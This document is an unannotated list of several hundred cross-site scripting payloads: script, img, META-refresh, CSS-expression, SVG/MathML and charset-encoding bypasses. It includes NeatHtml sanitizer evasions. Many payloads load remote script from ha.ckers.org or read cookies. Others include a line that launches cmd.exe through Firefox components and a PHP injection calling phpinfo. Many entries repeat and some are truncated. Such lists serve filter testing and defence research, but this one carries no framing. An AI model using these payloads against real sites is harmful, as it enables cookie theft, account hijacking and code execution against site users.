- <IMG SRC="mocha:[code]">
- <IMG SRC=’vbscript:msgbox(\”XSS\”)’>
- <IMG SRC=javascript:alert('XSS')>
- <img src=xx:x onerror=confirm(1)><script>document.body.innerHTML=document.body.innerText||document.body.textContent</script>
- <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
- <IMG STYLE=\”xss:expr/*XSS*/ession(alert(‘XSS’))\”>
- <IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
- <?import namespace=\”t\” implementation=\”#default#time2\”>
- <INPUT TYPE=\”IMAGE\” SRC=\”javascript:alert(‘XSS’);\”>
- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
- <label class=”<% confirm(1) %>”>
- <LAYER SRC=\”http://ha.ckers.org/scriptlet.html\”></LAYER>
- <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
- <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- <LINK REL=\”stylesheet\” HREF=\”http://ha.ckers.org/xss.css\”>
- <LINK REL=\”stylesheet\” HREF=\”javascript:alert(‘XSS’);\”>
- <<SCRIPT>alert(“XSS”);//<</SCRIPT>
- <<SCRIPT>alert("XSS");//<</SCRIPT>
- <<SCRIPT>alert(\”XSS\”);//<</SCRIPT>
- <META HTTP-EQUIV=\”Link\” Content=\”<http://ha.ckers.org/xss.css>; REL=stylesheet\”>
- <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”>
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”><META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert(‘XSS’);\”
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert(‘XSS’);\”
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”>
- <META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>\”>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:alert(‘XSS’)></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
- <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
- <OBJECT TYPE=\”text/x-scriptlet\” DATA=\”http://ha.ckers.org/scriptlet.html\”></OBJECT>
- <SCRIPT a=\”>’>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT \”a=’>’\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT a=`>` SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT a=\”>\” ‘’ SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT a=\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <script>alert('123');</script>
- <SCRIPT>alert('XSS')</SCRIPT>
- <script>alert(document.cookie);<script>alert
- <script>alert(document.cookie);</script>
- <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- <SCRIPT>alert(/XSS/.source)</SCRIPT>
- <SCRIPT>alert(‘XSS’);</SCRIPT>
- <SCRIPT>a=/XSS/
- <SCRIPT>document.write(\”<SCRI\”);</SCRIPT>PT SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- </script><script>alert(1)</script>
- </script><script>confirm(1)</script>
- <script>prompt('1')</script>
- <SCRIPT =\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT SRC=//ha.ckers.org/.js>
- <SCRIPT SRC=//ha.ckers.org/.j>
- <SCRIPT SRC=\”http://ha.ckers.org/xss.jpg\”></SCRIPT>
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- <SCRIPT/SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
- <SCRIPT SRC=http://ha.ckers.org/xss.js
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
- <SCRIPT/XSS SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT>
- <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <scrscriptipt>alert(1)</scrscriptipt>
- <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”></SPAN>
- <STYLE>.XSS{background-image:url(\”javascript:alert(‘XSS’)\”);}</STYLE><A CLASS=XSS></A>
- <STYLE>BODY{-moz-binding:url(\”http://ha.ckers.org/xssmoz.xml#xss\”)}</STYLE>
- <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
- <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
- <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
- <STYLE>@import’http://ha.ckers.org/xss.css’;</STYLE>
- <STYLE>@im\port’\ja\vasc\ript:alert(\”XSS\”)’;</STYLE>
- <STYLE>li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS
- <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
- <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- lt;STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- <STYLE type=\”text/css\”>BODY{background:url(\”javascript:alert(‘XSS’)\”)}</STYLE>
- <STYLE TYPE=\”text/javascript\”>alert(‘XSS’);</STYLE>
- <svg/onload=alert(63)//
- <svg/onload=alert(1)>
- <t:set attributeName=\”innerHTML\” to=\”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\”>
- <TABLE BACKGROUND=\”javascript:alert(‘XSS’)\”>
- <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
- <TABLE><TD BACKGROUND=\”javascript:alert(‘XSS’)\”>
- <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
- </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
- </TITLE><SCRIPT>alert(\”XSS\”);</SCRIPT>
- <?xml:namespace prefix=\”t\” ns=\”urn:schemas-microsoft-com:time\”>
- <XML ID=I><X><C><![CDATA[<IMG SRC=\”javas]]><![CDATA[cript:alert(‘XSS’);\”>]]>
- <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
- <XML ID="xss"><I><B><IMG SRC="javas<! — — >cript:alert('XSS')"></B></I></XML>
- <XML ID=\”xss\”><I><B><IMG SRC=\”javas<! — — >cript:alert(‘XSS’)\”></B></I></XML>
- <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
- <XML SRC=\”xsstest.xml\” ID=I></XML>
- ‘’;! — \”<XSS>=&{()}
- <XSS STYLE=\”behavior: url(xss.htc);\”>
- <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
- <XSS STYLE="xss:expression(alert('XSS'))">
- <XSS STYLE=\”xss:expression(alert(‘XSS’))\”>
- maliciousdata[varinput[‘name’]] = payloads[1]
- <marguee/onstart=alert(1)>//INJECTX
- <marker id=”a” markerWidth=”1000" markerHeight=”1000" refX=”0" refY=”0">
- “><marquee>confirm( `bypass :)`)</marquee>
- <marquee/finish=confirm(2)>/
- ‘“>><marquee><h1>1</h1></marquee>
- <marquee><h1>XSS by xss</h1></marquee>
- ‘>><marquee><h1>XSS</h1></marquee>
- ‘>><marquee><h1>XSS</h1></marquee>
- ‘“>><marquee><h1>XSS</h1></marquee>
- ‘“>><marquee><h1>XSS</h1></marquee>
- ‘“>><marquee><img src=x onerror=confirm(1)></marquee>
- ‘“>><marquee><img src=x onerror=confirm(1)></marquee>”></plaintext\></|\><plaintext/onmouseover=prompt(1)>
- “>><marquee><img src=x onerror=confirm(1)></marquee>” ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →” ></script><script>alert(1)</script>”><img/id=”confirm( 1)”/alt=”/”src=”/”onerror=eval(id&%23x29;>’”><img src=”http: //i.imgur.com/P8mL8.jpg”>
- ‘“>><marquee><img src=x onerror=confirm(1)></marquee>”></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →”></script><script>alert(1)</script>”><img/id=”confirm(1)”/alt=”/”src=”/”onerror=eval(id&%23x29;>’”><img src=”http://i.imgur.com/P8mL8.jpg">
- <marquee loop=1 width=0 onfinish=alert(1)>
- >><marquee loop=1 width=0 onfinish=alert(1)>
- <marquee loop=1 width=0 onfinish=alert(100)>
- <marquee loop=1 width=0 onfinish=alert(1)>//INJECTX
- <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
- <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)
- /><marquee onfinish=confirm(123)>a</marquee>
- /><marquee onfinish=confirm(123)>a</marquee>
- <marquee onScroll marquee onScroll=”javascript:javascript:alert(1)”></marquee onScroll>
- <mArquee onStart%3D[~[onmouseleave(([[(alert(1))]]))]] ]
- <marquee/onstart=alert()>
- <marquee onstart=alert(1)>
- <marquee/onstart=alert(1)>renwa
- <marquee onstart=alert(30)></marquee>
- <marquee onstart=alert(99)>
- <marquee onstart=alert(‘XSS’)>
- <marquee/onstart=confirm(2)>/
- <marquee/onstart=confirm(2)>
- <marquee/onstart=confirm(/XSS/.source);confirm(1)>
- ><marquee/onstart=confirm(/XSS/.source);confirm(1)>
- “<marquee/onstart=confirm(/XSS/.source);confirm(1)>”
- “\”><marquee/onstart=confirm(/XSS/.source);confirm(1)>”,
- <marquee/onstart=document.body.innerHTML=location.hash>//#<img src=x onerror=prompt(1)>>
- <marquee onstart=’javascript:alert(‘1’);’>=(?_?)=
- <marquee onstart=’javascript:alert(1)’>^__^
- <marquee onstart=’javascript:confirm(1)’>^__^
- <marquee onStart marquee onStart=”javascript:javascript:alert(1)”></marquee onStart>
- <marquee/onstart=this[‘innerHTML’]=location.hash;>//#<img src=x onerror=alert(document.domain)>
- <marquee/onstart=this[‘innerHTML’]=unescape(location.hash);>//#<img src=x onerror=alert(document.domain)>
- <marquee><script>alert(‘XSS’)</script></marquee>
- <marquee><script>alert(‘XSS’)</script></marquee>
- ‘;’>”><marquee>test</marquee><plaintext/onmouseover=prompt(test)>
- <math><annotation-xml encoding=text/html><![CDATA[></math><!]]>
- <math><annotation-xml encoding=text/html><script></</script/>a<!>l<?>ert(</>1)</></script>
- <math><annotation-xml encoding=”text/html”><xmp></xmp><img src=x onerror=alert(1)></xmp>
- <math><annotation-xml><textarea/><svg><script>alert(1)</script>
- <math><a xlink:href=javascript:…>
- <math><a xlink:href=javascript:alert(1)>M
- <math><a/xlink:href=javascript:confirm(1)>click
- <math><a/xlink:href=javascript:eval(‘\141\154\145\162\164\50\61\51’)>X
- <math><a xlink:href=”//jsfiddle.net/t846h/”>click //
- <math><a xlink:href=”//jsfiddle.net/t846h/”>click
- <math><a xlink:href=”//jsfiddle.net/t846h/”>click
- <Math> <a xlink:href=”//jsfiddle.net/t846h/”> click
- <math><brute href=javascript:alert(1)>
- <math><brute href=javascript:alert(1)>click *
- <math><brute href=javascript:alert(1)>click
- <math><brute href=javascript:alert(1)>click
- <math><brute xlink:href=javascript:alert(175)>click
- <math><brute xlink:href=javascript:alert(1)>click *
- <math><brute xlink:href=javascript:alert(1)>click
- <math><brute xlink:href=javascript:alert(1)>click
- <math href=”javascript:alert(1)”>CLICKME
- <math href=”javascript:javascript:alert(1)”>CLICKME</math> <math> <maction actiontype=”statusline#http://google.com" xlink:href=”javascript:javascript:alert(1)”>CLICKME</maction> </math>
- <math href=”javascript:javascript:alert(1)”>CLICKME</math> <math> <maction actiontype=”statusline#http://google.com" xlink:href=”javascript:javascript:alert(1)”>CLICKME</maction> </math>
- <math><kukux href=javascript:alert(164)>click
- <math><kukux xlink:href=javascript:alert(175)>click
- <math><maction actiontype=”statusline#http://google.com" href=”//evil”>click
- <math><script>//<head><script>alert(1)</script>
- <math><script>sgl=’<img/src=xx:x onerror=alert(1)>’</script>
- <math><style>*{font-family:’<img/src=xx:x onerror=alert(1)>’}</style>
- <math><!V href=javascript:alert(1)//
- <math><!V” href=javascript:alert(1)//
- <math xlink:href=javascript:..>
- <math xlink:href=”jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e”>click me</math>
- <math xml:base=”javascript:alert(1)//”><mrow href=”#”>qwe</mrow></math>
- <math xml:base=”javascript:alert(1)//”> <mrow href=”#”>qwe</mrow></math>
- <math><XSS href=”javascript:alert(location)”>aaa
- {{m=[({}).constructor.defineProperties];[[‘’.toString.constructor,{‘constructor’:{} }].reduce(m[0])];’’.toString.constructor(‘alert(1)’)()}}
- <me#a http-equiv=Content-Security-Policy content=script-src self>
- me!</button></form></dialog>
- <menu id=x contextmenu=x onshow=alert(107)>right click me!
- <menu id=x contextmenu=x onshow=alert(1)>right click me!
- <meta charset=gbk><script>a=’x?\’;alert(1)//’;</script>
- <meta charset=iso-2022-cn>
- <meta charset=iso-2022-jp><%1B(Jd%1B(Ji%1B(Jv><i%1B(Jm%1B(Jg s%1B(Jr%1B(Jc%1B(J=%1B(Jx o%1B(Jn%1B(Jer%1B(Jr%1B(Jo%1B(Jr%1B(J=%1B(Ja%1B(Jl%1B(Je%1B(Jr%1B(Jt(1)//%1B(J<%1B(J/%1B(Jd%1B(Jiv%1B(J>%1B(J
- <meta charset=iso-2022-jp><script>alert(1)[0x1B]$@[0x0A]</script>
- <meta charset=iso-2022-jp><script>alert(14)[0x1B]$@[0x0A]</script>
- <meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(1)>
- <meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(13)>
- <meta charset=”mac-farsi”>?script?javascript:alert(1)?/script?
- <meta charset=”x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
- <meta charset= “x-imap4-modified-utf7”&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
- <meta charset=”x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
- <meta charset=”x-mac-farsi”>A?A?script A?A?confirm(1)//A?A?/script A?A?
- <meta/content=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg==”http-equiv=refresh>
- <meta content=”
 1 
; JAVASCRIPT: alert(1)” http-equiv=”refresh”/>
- <meta content=”
 1 
;JAVASCRIPT: alert(1)” http-equiv=”refresh”/>
- <Meta content = “& NewLine; 1 & NewLine ;; JAVASCRIPT & colon; alert (1)” http-equiv = “refresh” />
- <meta content=”
 1 
; JAVASCRIPT: confirm(1)” http-equiv=”refresh”/>
- <META HTTP-EQUIV=”Link” Content=”<%(css)s>; REL=stylesheet”>
- <;META HTTP-EQUIV=”;Link”; Content=”;<;http://ha.ckers.org/xss.css>;; REL=stylesheet”;>;
- <META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css>; REL=stylesheet”>
- <META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css>;; REL=stylesheet”>
- <meta HTTP-EQUIV=”Link” Content=”<http://www.securitycompass.com/xss.css>; REL=stylesheet”>
- <META HTTP-EQUIV=”Link” Content=”<http://xss.cx/xss.css>; REL=stylesheet”>
- <META HTTP-EQUIV=”Link” Content=”<http://xxxx.com/xss.css>; REL=stylesheet”>
- <META HTTP-EQUIV=”Link” Content=”<javascript:alert(‘XSS’)>; REL=stylesheet”>
- <META HTTP-EQUIV=”Link” Content=”<javascript:confirm(document.location)>; REL=stylesheet”>
- <meta http-equiv=”refresh” content=”0;
- <meta http-equiv=refresh content=”0 javascript:alert(1)”>
- <meta http-equiv=”refresh” content=”0;javascript:alert(1)”/>
- <meta http-equiv=”refresh” content=”0;javascript:alert(1)”/>?
- <meta http-equiv=”refresh” content=”0;javascript:alert(1)”/>
- <Meta http-equiv = “refresh” content = “0; javascript & colon; alert (1)” />
- <meta http-equiv=”refresh” content=”0;javascript:confirm(1)”/>?
- <meta http-equiv=”refresh” content=”0;javascript:confirm(1)”/>
- “><meta http-equiv=”refresh” content=”0;javascript:confirm(1)”/>
- <meta http-equiv=refresh content=”0 javascript:confirm(1)”>
- <meta http-equiv=”refresh” content=”0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E”>
- <;META HTTP-EQUIV=”;refresh”; CONTENT=”;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”;>;
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
- <meta http-equiv=”refresh” content=”0;url=//goo.gl/nlX0P”>
- <meta http-equiv=”refresh” content=”0;url=//goo.gl/nlX0P”>
- <Meta http-equiv = “refresh” content = “0; url = // goo.gl/nlX0P”>
- <meta http-equiv=”refresh” content=”0;url=http://good/[>>>inj];url=http://evil/[<<<inj]">
- <;META HTTP-EQUIV=”;refresh”; CONTENT=”;0; URL=http://;URL=javascript:alert(';XSS';);";>;
- <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert('XSS');">
- <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert('XSS');">
- <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(XSS);">
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert('XSS');\">
- <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:confirm(document.location);">
- <meta HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:document.vulnerable=true;">
- <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:javascript:alert(1);">
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(1);\”>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XoSS’);”>
- <;META HTTP-EQUIV=”;refresh”; CONTENT=”;0;url=javascript:alert(‘;XSS’;);”;>;
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(XSS);”>
- <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”>
- <meta http-equiv=”refresh” content=”0;url=javascript:confirm(1)”>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:confirm(document.location);”>
- <meta http-equiv=”refresh” content=”0;url=javascript:document.vulnerable=true;”>
- <meta HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:document.vulnerable=true;”>
- “><meta http-equiv=”Refresh” content=”0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))>
- “><meta http-equiv=”Refresh”content=”0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))>
- <META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:javascript:alert(1);”>
- <meta http-equiv=refresh content=+.1,javascript:confirm(document.cookie)>
- <meta http-equiv=refresh content=”?,javascript:alert(1)”>
- <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>”>
- <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>confirm(document.location)</SCRIPT>”>
- <;META HTTP-EQUIV=”;Set-Cookie”; Content=”;USERID=<;SCRIPT>;alert(‘;XSS’;)<;/SCRIPT>;”;>;
- <META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>”>
- <meta HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>document.vulnerable=true</SCRIPT>”>
- <meta http-equiv=”x-ua-compatible” content=”ie=7">
- <meta http-equiv=”x-ua-compatible” content=”ie=7"><iframe src=//targetsite.com?xss=<div/style=”width:expression(confirm(1))”>X</div>
- <meta http-equiv=”x-ua-compatible” content=”ie=7"><iframe src=��//targetsite.com?xss=<div/style=”width:expression(confirm(1))”>X</div>��
- <meta http-equiv=x-ua-compatible content=ie=8>
- <meta http-equiv=”x-ua-compatible” content=”ie=9">
- <meta http-equiv=”x-ua-compatible” content=”ie=9"><iframe src=//targetsite?xss=<svg/onload%00=%00locatio%00n=nam%00e name=javascript:alert(document.domain)>
- <meta name=referrer content=never>
- <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow=”alert(1)”;
- <meta style=”xss:expression(open(alert(1)))” />
- <meter onmouseover=”alert(1)”
- method=”dialog”><button>Close
- <MovieHeight>600</MovieHeight>
- ?movieName=”;]);}catch(e){}if(!self.a)self.a=!confirm(document.domain);//
- <MovieURL>http://thebest404pageever.com/swf/FUUUUUUUUUUUUUUUUUUUUUUUUUCK.swf</MovieURL>
- <MovieWidth>800</MovieWidth>
- moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
- $=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/)
- $=<>@mozilla.org/js/function</>;$::[<>alert</>](/@superevr/)
- myTagid=”someId” class=”class1vdata-foo=”bar” /myTag
- myTagid=”someId” class=”class1vdata-foo=”bar”?/myTag
- name=alert(1)onerror=eval(name) src=1 autofocus onfocus=eval(name)
- name=javascript:alert(document.domain)>
- name=”javascript:alert(“XSS”)”></iframe>
- <name>’,’’)); phpinfo(); exit;/*</name>
- navigateToURL(new URLRequest(“Javascript: document.write(\”<script>confirm(1)</scr\”+\”ipt>\”)”),”_self”)
- navigator.geolocation.getCurrentPosition(function(p){
- navigatorurl:test” -chrome “javascript:C=Components.classes;I=Components.interfaces;file=C[\’@mozilla.org/file/local;1\’].createInstance(I.nsILocalFile);file.initWithPath(\’C:\’+String.fromCharCode(92)+String.fromCharCode(92)+\’Windows\’+String.fromCharCode(92)+String.fromCharCode(92)+\’System32\’+String.fromCharCode(92)+String.fromCharCode(92)+\’cmd.exe\’);process=C[\’@mozilla.org/process/util;1\’].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
- navigator.vibrate(500)
- navigator.webkitGetUserMedia({‘video’:true},function(s){
- navigator.webkitGetUserMedia({video:true},function(s){
- \nconfirm(1)
- <NeatHtmlLt /><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
- <NeatHtmlLt /><? echo(‘<NeatHtmlLt /><SCR)’; echo(‘IPT>alert(“XSS”)</SCRIPT>’); ?>
- <NeatHtmlLt /><IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
- <NeatHtmlLt /><IMG SRC=javascript:alert('XSS')>
- <NeatHtmlLt /><IMG SRC=javascript:alert('XSS')>
- <NeatHtmlLt /><IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
- <NeatHtmlLt /><IMG SRC=”javascript:alert(‘XSS’)”
- <NeatHtmlLt /><IMG SRC=javascript:alert('XSS')>
- <NeatHtmlLt /><?import namespace=”xss”implementation=”http://ha.ckers.org/xss.htc">
- <NeatHtmlLt /><META HTTP-EQUIV=”Link” Content=”<NeatHtmlLt /><http://ha.ckers.org/xss.css>; REL=stylesheet”>
- <NeatHtmlLt /><META HTTP-EQUIV=”refresh”CONTENT=”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K”>
- <NeatHtmlLt /><META HTTP-EQUIV=”refresh” CONTENT=”0;URL=http://;URL=javascript:alert('XSS');">
- <NeatHtmlLt /><META HTTP-EQUIV=”refresh”CONTENT=”0;url=javascript:alert(‘XSS’);”>
- <NeatHtmlLt /><META HTTP-EQUIV=”Set-Cookie” Content=”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>”>
- <NeatHtmlLt /><<SCRIPT>alert(“XSS”);//<NeatHtmlLt /><</SCRIPT>
- <NeatHtmlLt /><SCRIPT\s” != “<NeatHtmlLt /><SCRIPT/XSS\s
- <NeatHtmlLt /><SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
- <NeatHtmlLt /><SCRIPT/SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- /<NeatHtmlLt /><script((\s+\w+(\s*=\s*(?:”(.)*?”|’(.)*?’|[^’”>\s]+))?)+\s*|\s*)src/i
- <NeatHtmlLt /><SCRIPT/XSS SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
- <NeatHtmlParserReset s=’’ d=”” /><script></script><TABLE BACKGROUND_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
- <NeatHtmlReplace_BASE HREF=”javascript:alert(‘XSS’);//”>
- <NeatHtmlReplace_BGSOUND SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”>
- <NeatHtmlReplace_BODY BACKGROUND_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
- <NeatHtmlReplace_BODY ONLOAD_NeatHtmlReplace=”alert(‘XSS’)”>
- <NeatHtmlReplace_C><IMG SRC="javascript:alert(‘XSS’);">
- </NeatHtmlReplace_C></NeatHtmlReplace_X></NeatHtmlReplace_xml><SPAN DATASRC_NeatHtmlReplace=”#I” DATAFLD_NeatHtmlReplace=”C” DATAFORMATAS_NeatHtmlReplace=”HTML”></SPAN>
